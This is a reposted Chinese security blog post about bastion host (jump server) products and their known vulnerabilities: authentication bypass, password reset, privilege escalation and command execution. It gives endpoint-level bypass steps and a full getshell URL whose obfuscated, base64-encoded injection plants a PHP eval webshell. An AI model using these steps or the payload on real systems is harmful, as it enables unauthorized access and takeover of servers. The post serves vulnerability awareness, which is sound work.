堡垒机及其相关漏洞

admin 2023年5月31日09:44:56评论127 views字数 1457阅读4分51秒阅读模式



堡垒机及其相关漏洞

堡垒机及其相关漏洞



堡垒机

堡垒机及其相关漏洞



堡垒机及其相关漏洞


堡垒机,又称运维安全审计系统,为了保障网络和数据不受来自外部和内部用户的入侵和破坏,而运用各种技术手段实时收集和监控网络环境中每一个组成部分的系统状态、安全事件、网络活动的服务器。可进行事先防范、事中控制与事后溯源,实现集中管理的目标,包括身份认证(Authentication)、账号管理(Account)、授权控制(Authorization)与安全审计(Audit),也称4A。



从开源的角度划分,主要有开源堡垒机和商业堡垒机两种。

        Jumpserver 是全球首款完全开源的堡垒机,是符合 4A 的专业运维审计系统,在GitHub 上Star 数超过 12.4k,从这个趋势就可以看出其受欢迎程度。github地址:https://github.com/jumpserver/jumpserver。

        但开源堡垒机的弊端就是无法及时处理相关漏洞,因此购买商业堡垒机是企业更好的选择。目前市场上的堡垒机有齐治、思福迪、镁盾等等产品。


从堡垒机的产品形态上划分,可分为传统堡垒机、软件堡垒机和云堡垒机。上方图示即为传统堡垒机。



堡垒机相关漏洞

堡垒机及其相关漏洞


结合网络中已暴露的堡垒机安全风险,在此进行评估方向的梳理。

  1. 【绕过密码验证登录】思福迪LogBase-B798堡垒机bh-x64-v7.0.13、bh-x64-v7.0.15版本存在绕过密码验证机制,由于堡垒机web管理页面用户身份验证逻辑存在设计缺陷,导致攻击者可以无需密码直接登录堡垒机任意账号,包括超级管理员。漏洞产生的原因是访问https://xxx/bhost/set_session并传递用户名,系统会自动返回info信息,再将info和用户名在访问https://xxx/bhost/login_link进行传递,即可实现免密登录。可理解一种情景,后端同时传递了问题和正确答案到前端,前端自然可以轻易绕过问题限制了。

  2. 【任意用户密码重置】帕拉迪堡垒机曾爆出任意用户密码重置漏洞,漏洞链接:https://www.uedbox.com/post/29701/,在修改密码时抓包修改id,即可修改其他用户的密码。

  3. 【越权】堡垒机中存在多级用户,通常会存在管理员和普通用户。中科曙光堡垒机曾曝出漏洞,普通用户可垂直越权设置用户权限(https://www.uedbox.com/post/20893/ )。

  4. 【远程命令执行】齐治堡垒机后台曾曝出许多命令执行漏洞,这里列举CNVD-2019-20835,访问如下:

    http://(Mainurl/listener/cluster_manage.php

    执行以下链接即可getshell,执行成功后,生成PHP一句话马/var/www/shterm/resources/qrcode/lbj77.php密码10086

    https://MainUrl/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}"ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}-d|bash`|${IFS}|echo${IFS}




长按二维码获取最新知识!

堡垒机及其相关漏洞

原文始发于微信公众号(火枪手联盟安全团队):堡垒机及其相关漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月31日09:44:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   堡垒机及其相关漏洞https://cn-sec.com/archives/1044630.html

发表评论

匿名网友 填写信息